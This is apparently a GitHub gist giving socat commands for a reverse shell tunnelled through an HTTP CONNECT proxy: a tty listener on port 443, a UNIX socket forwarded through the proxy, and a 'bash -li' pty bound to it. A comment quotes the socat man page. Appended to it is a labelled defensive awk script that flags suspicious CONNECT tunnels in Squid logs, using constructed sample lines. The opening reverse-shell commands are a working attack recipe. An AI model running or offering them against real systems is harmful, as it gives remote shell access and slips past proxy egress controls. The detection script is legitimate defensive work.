@staaldraad
Last active January 12, 2024 12:24
# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at 10.10.10.1:8222:
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"

staaldraad commented Aug 31, 2018

The proxy server must allow CONNECT proxying

socat man-page entry:

PROXY:<proxy>:<hostname>:<port>
Connects to an HTTP proxy server on port 8080 using TCP/IP version 4 or 6 depending on address specification, name resolution, or option pf, and sends a CONNECT request for hostname:port. If the proxy grants access and succeeds to connect to the target, data transfer between socat and the target can start. Note that the traffic need not be HTTP but can be an arbitrary protocol.
Option groups: FD,SOCKET,IP4,IP6,TCP,HTTP,RETRY
Useful options: proxyport, ignorecr, proxyauth, resolve, crnl, bind, connect-timeout, mss, sourceport, retry
See also: SOCKS, TCP

Could probably do this in a one-liner but I was failing. The two part-er worked a charm 🎉
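
For whoever runs the proxy: because a granted CONNECT carries arbitrary traffic, the tunnel itself is the thing to look for in the proxy log. The following is an added example, not part of the gist or of socat; it assumes Squid's native access.log layout, and the function names, thresholds and sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the gist): flag CONNECT tunnels in a proxy log.
# Assumes Squid's native access.log layout:
#   time elapsed_ms client action/code bytes method URL ident peer type

# Constructed sample lines, not real traffic.
sample_log() {
cat <<'EOF'
1535700000.101    420 10.10.10.20 TCP_TUNNEL/200 5120 CONNECT updates.example.com:443 - HIER_DIRECT/198.51.100.10 -
1535700001.202 913000 10.10.10.50 TCP_TUNNEL/200 48210 CONNECT 203.0.113.7:443 - HIER_DIRECT/203.0.113.7 -
1535700002.303     95 10.10.10.21 TCP_MISS/200 1830 GET http://intranet.example.com/ - HIER_DIRECT/198.51.100.20 text/html
1535700003.404   1200 10.10.10.50 TCP_TUNNEL/200 900 CONNECT build.example.com:8443 - HIER_DIRECT/198.51.100.30 -
1535700004.505    300 10.10.10.22 TCP_DENIED/403 0 CONNECT 203.0.113.9:22 - HIER_NONE/- -
EOF
}

# flag_tunnels [min_ms]: read a log on stdin and print "client dest reasons"
# for every granted CONNECT whose destination is an IP literal, uses a port
# other than 443, or stayed open for at least min_ms (default: 10 minutes).
flag_tunnels() {
  awk -v min_ms="${1:-600000}" '
    $6 == "CONNECT" && $4 ~ /\/200$/ {
      host = $7; sub(/:[0-9]+$/, "", host)   # strip the trailing :port
      port = $7; sub(/^.*:/, "", port)       # keep only the port
      reasons = ""
      # IPv4 dotted quad or bracketed IPv6 instead of a hostname
      if (host ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ || host ~ /^\[/)
        reasons = reasons "ip-literal,"
      if (port != "443")
        reasons = reasons "port-" port ","
      if ($2 + 0 >= min_ms + 0)
        reasons = reasons "long-lived,"
      if (reasons != "") {
        sub(/,$/, "", reasons)
        print $3, $7, reasons
      }
    }'
}

sample_log | flag_tunnels
```

These signals are triage hints rather than verdicts: legitimate long-lived TLS sessions match too, so tune `min_ms` and the allowed ports to the proxy's normal traffic.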
